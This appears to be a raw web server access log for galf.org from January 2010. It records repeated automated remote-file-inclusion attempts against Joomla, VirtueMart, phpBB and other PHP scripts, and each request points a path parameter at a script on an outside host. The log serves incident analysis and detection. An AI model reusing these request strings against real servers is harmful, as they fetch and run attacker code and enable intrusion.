203.253.25.15 - - [24/Jan/2010:16:01:08 -0800] "GET /appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.201.180.130 - - [24/Jan/2010:16:02:07 -0800] "GET /logs/access_091228.log/components/com_simpleboard/image_upload.php?sbp=http://submundodigital.xpg.com.br/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:02:33 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:02:33 -0800] "GET /appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:02:33 -0800] "GET /logs//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:02:38 -0800] "GET /appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:02:38 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:02:38 -0800] "GET /logs//appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:03:03 -0800] "GET /logs/access_090928.log//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:03:22 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:03:22 -0800] "GET /logs//appserv/main.php?appserv_root=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:04:29 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:04:29 -0800] "GET /logs//appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:04:29 -0800] "GET /appserv/main.php?appserv_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.180.124.135 - - [24/Jan/2010:16:05:18 -0800] "GET /logs/access.log//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:05:18 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:05:19 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:05:33 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:05:35 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:05:36 -0800] "GET /logs/access.log//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.135.199 - - [24/Jan/2010:16:05:37 -0800] "GET /logs/access.log%20%20//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.135.199 - - [24/Jan/2010:16:05:37 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.135.199 - - [24/Jan/2010:16:05:37 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.223.135.199 - - [24/Jan/2010:16:05:50 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.135.199 - - [24/Jan/2010:16:05:50 -0800] "GET /logs/access.log//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.135.199 - - [24/Jan/2010:16:05:50 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:06:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:06:08 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:06:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:06:51 -0800] "GET /logs/access_090928.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:06:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:06:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:06:57 -0800] "GET /logs/access_090824.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:07:04 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:07:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:07:37 -0800] "GET /logs/access_090824.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:07:41 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:07:41 -0800] "GET /logs/access.log//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:07:46 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:07:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:07:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:07:49 -0800] "GET /logs/access_090928.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:07:50 -0800] "GET /logs//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:07:50 -0800] "GET /logs/access.log//board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [24/Jan/2010:16:07:50 -0800] "GET /board/bbs/delete_all.php//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:07:53 -0800] "GET /logs/access_090824.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:07:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:07:59 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:07:59 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:08:55 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:08:55 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:08:59 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:09:25 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:09:34 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:09:38 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:09:54 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:09:54 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:11:57 -0800] "GET /logs/access.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:11:57 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:11:57 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
218.38.12.14 - - [24/Jan/2010:16:14:22 -0800] "GET /logs/access_091026.log%20%20///modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:14:22 -0800] "GET //modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:14:22 -0800] "GET /logs///modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.theworldleague.net//modules/Forums/admin/language/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:05 -0800] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:05 -0800] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:20 -0800] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:55 -0800] "GET /logs/access_091109.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:15:58 -0800] "GET /logs/access_091109.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:16:08 -0800] "GET /logs/access_091109.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:16:29 -0800] "GET /logs/access_100111.log%20%20//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:16:30 -0800] "GET /logs//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:16:30 -0800] "GET /admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:16:30 -0800] "GET /logs/access_100104.log%20%20//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:17:00 -0800] "GET /logs/access.log//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:17:01 -0800] "GET /logs/access_091207.log//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [24/Jan/2010:16:17:01 -0800] "GET /logs/access_091019.log//admin.x-shop.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:19:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:19:35 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:19:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:19:35 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:22 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:24 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:25 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:26 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:27 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:28 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.201.180.130 - - [24/Jan/2010:16:20:37 -0800] "GET /logs/access_091214.log//components/com_simpleboard/image_upload.php?sbp=http://submundodigital.xpg.com.br/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.201.180.130 - - [24/Jan/2010:16:20:37 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://submundodigital.xpg.com.br/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.201.180.130 - - [24/Jan/2010:16:20:37 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://submundodigital.xpg.com.br/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:44 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:20:44 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:21:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:21:01 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:21:01 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:21:05 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:21:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:21:10 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:21:10 -0800] "GET /logs/access_090727.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:16:21:36 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:21:36 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:16:21:36 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [24/Jan/2010:16:23:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:23:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:23:44 -0800] "GET /logs/access_090727.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:23:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:23:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [24/Jan/2010:16:23:45 -0800] "GET /logs/access_090727.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
